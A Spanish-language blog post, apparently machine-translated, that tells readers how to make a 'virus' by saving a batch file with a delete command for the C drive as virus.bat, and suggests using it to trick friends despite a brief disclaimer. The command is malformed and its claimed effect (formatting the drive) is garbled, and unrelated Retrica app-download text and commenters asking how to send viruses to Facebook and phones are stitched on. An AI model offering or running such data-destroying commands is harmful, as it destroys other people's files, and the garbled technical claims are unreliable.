05 AM | 25 Ago

Cómo crear un virus en menos de 60 segundos

1,7k Cómo crear un virus en menos de 60 segundos Hoy estamos aquí con el método de Cómo crear un virus en menos de 60 segundos. Hoy en día cada dos personas está utilizando la computadora y casi cada uno de ellos sabe de virus. Virus es un programa malicioso que entra en la computadora sin su permiso y puede afectar a los datos y de trabajo del sistema operativo. Bueno virus son de diferentes tipos, ya que hay troyanos y muchos más. Pero ¿sabía usted piensa acerca de la creación de un virus. Sí, usted puede hacerlo sólo en 60 segundos. Y es posible con un método muy simple y fácil que he hablado en este post, por lo que acaba de leer el siguiente para continuar.

Cómo crear un virus en menos de 60 segundos Muchos de ustedes piensan que el método será de gran codificación, pero no hay nada de eso, sólo tienes que escribir 5-6 palabras para crear un virus muy dañino que puede incluso formatear la unidad ordenador completamente. El truco se basa en el bloc de notas y algunas palabras de programa por lotes que se ejecutará automáticamente cuando se abre en un sistema informático y dará formato a la unidad seleccionada y puede dañar el sistema operativo de dicho equipo. Sólo tienes que seguir los siguientes pasos para la creación de un virus dentro de un minuto.

Pasos para crear un virus en menos de 60 segundos

En primer lugar en su sistema operativo Windows abrir el bloc de notas. Ahora copia y pega el siguiente código en la pantalla de su bloc de notas.

echo Off

Del C: *. * | Y

Ahora guarda este archivo como virus.bat (puede seleccionar cualquiera de nombre aleatorio, pero .bat después de eso hay que estar allí). Ahora se ejecuta este archivo de virus se eliminará la unidad C por completo y el sistema operativo del equipo respectivo corromperse.

Nota: – Este método es sólo para fines de conocimiento. No intente hacer esto en su ordenador, ya que formatear por completo la unidad C.

Así que esto es todo acerca de cómo crear un virus en menos de 60 segundos. Por este método se puede crear fácilmente un virus dañino y puede corrompe el sistema operativo de cualquier ordenador. Y usted puede intentar este truco en cualquier otra unidad que C, y puede hacer que sus amigos engañen. espero que les guste el puesto. no te olvides de compartir este post fresco con tus amigos.

Descargar Retrica
descargar retricaretrica
Esta pagina web esta dedicada a los amantes de las aplicaciones gratuitas de fotografia, enfocado en la descarga de retrica, una de las aplicaciones para android e IOS de Apple mas utilizadas y descargadas del ultimo tiempo.
Una de las razones de que sea tan descargada es su facilidad, simplicidad y que este disponible para todo tipo de dispositivo movil, es decir, vas a poder descargar retrica para celulares, para tablets y para pc o laptop. Además Retrica es compatible con todos los modelos de celulares de las marcas Samsung Galaxy, Sony, LG, Nokia, Apple Iphone, entre otros.
Si tienes alguna pregunta sobre como descargar Retrica en tu celular o bajar Retrica en tu computador o notebook, no dudes en dejar tu consulta en el area de comentarios para poder ayudar a bajar esta aplicacion.

Comentarios sobre descargar Retrica

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

5 Comments

  • fede

    hola como creo virus para mandar a facebook

    ↶Reply 2 julio, 2016 12:06 am
    • Bromo

      Primero te pones enfermo,después coges tu sangre y la metes a Facebook.

      ↶Reply 1 julio, 2017 2:26 pm
  • yunaisis

    hola,me gustaría aprender a enviar virus a celulares asi como reperarlos

    ↶Reply 4 abril, 2017 3:43 pm
  • nilson

    vamos acabar con todos

    ↶Reply 14 noviembre, 2017 12:20 pm
  • nilson

    aajajajajajajajajajajajaja

    ↶Reply 14 noviembre, 2017 12:20 pm